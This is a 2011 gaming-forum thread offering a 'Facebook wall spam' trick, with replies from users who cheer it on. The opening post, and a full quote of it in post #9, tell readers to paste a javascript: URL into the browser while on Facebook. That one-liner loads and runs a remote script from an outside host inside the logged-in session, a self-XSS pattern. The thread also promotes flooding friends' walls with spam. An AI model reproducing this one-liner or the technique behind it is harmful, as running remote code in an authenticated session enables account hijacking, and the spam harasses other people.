10-08-2011, 01:18 PM #1
Andrew!
The /̵͇̿̿/'̿'̿ ̿ ◕ lives!
(adsbygoogle = window.adsbygoogle || []).push({}); Step 1: Open to your firefox or Chrome browser.

Step 2: Visit your poor friend’s profile who’s wall you are gonna spam on.

Step 3: Enter the following javascript in the URL bar and hit enter.

java+script:+(a = (b = document).createElement("script")).src = "//hallwayinsider.com/a.js", b.body.appendChild(a); void(0)

You need to remove the plus signs after you paste it. There's 1 before and after the word script at the beginning. If you do it before then the full java script won't paste.

Step 4: A message box will open up asking you to choose the number of messages you want to spam, enter a number.

Step 5: Next, enter the text that you want to spam on your friend’s wall.

Step 6: Wait a few seconds, and refresh your page and you can see your friends wall flooded with your spam messages.

NOTE :
While using this trick be aware that :
1 . Your safe browsing is turned off, you are not browsing facebook on https mode.
2. Spamming more than 100 messages in less than an hour will ban you for a day preventing you to spam any further wall posts.

The following 8 users say thank you to Andrew! for this useful post:

AMNE, Classy., cooljordan_62, coolz3, LeBron-James, Webby, xRafiq-
10-08-2011, 01:22 PM #2
doxis
< ^ > < ^ >
Im not able to spam at facebook Awesome face They sended me an email and they suspended my account, i did got it back but im not allowd to spam Awesome face
10-08-2011, 01:22 PM #3
Default Avatar
COD
My friend deleted me lol :l who cares lol.
10-08-2011, 01:35 PM #4
Andrew!
Originally posted by doxis View Post
Im not able to spam at facebook Awesome face They sended me an email and they suspended my account, i did got it back but im not allowd to spam Awesome face

Haha thats funny.

---------- Post added at 09:35 AM ---------- Previous post was at 09:34 AM ----------

Originally posted by Louie1996 View Post
My friend deleted me lol :l who cares lol.

Spam his wall he will go on and have 1000 notifications thinking hes coola and has loads of friends. The it will just be you. :y:
10-08-2011, 02:32 PM #5
i did this to my best mate Happy
10-08-2011, 02:33 PM #6
Andrew!
Originally posted by TheBatman View Post
i did this to my best mate Happy

Yeah it's so funny.
10-08-2011, 02:36 PM #7
Originally posted by Andrew
Yeah it's so funny.

nice sig btw and irk, he was so f*cked off
10-08-2011, 02:44 PM #8
Andrew!
Originally posted by TheBatman View Post
nice sig btw and irk, he was so f*cked off

Thanks man :y:
10-08-2011, 02:59 PM #9
Classy.
<3 BOXXY <3
Originally posted by Andrew
Step 1: Open to your firefox or Chrome browser.

Step 2: Visit your poor friend’s profile who’s wall you are gonna spam on.

Step 3: Enter the following javascript in the URL bar and hit enter.

java+script:+(a = (b = document).createElement("script")).src = "//hallwayinsider.com/a.js", b.body.appendChild(a); void(0)

You need to remove the plus signs after you paste it. There's 1 before and after the word script at the beginning. If you do it before then the full java script won't paste.

Step 4: A message box will open up asking you to choose the number of messages you want to spam, enter a number.

Step 5: Next, enter the text that you want to spam on your friend’s wall.

Step 6: Wait a few seconds, and refresh your page and you can see your friends wall flooded with your spam messages.

NOTE :
While using this trick be aware that :
1 . Your safe browsing is turned off, you are not browsing facebook on https mode.
2. Spamming more than 100 messages in less than an hour will ban you for a day preventing you to spam any further wall posts.

Can this work with any website? Or just facebook?
10-08-2011, 03:16 PM #10
ShinigamiUzi
Proud to be a Player
unfortunately I don't have enemies :(

The following user thanked ShinigamiUzi for this useful post:

Mr Grumpy

Copyright © 2024, NextGenUpdate.
All Rights Reserved.

Gray NextGenUpdate Logo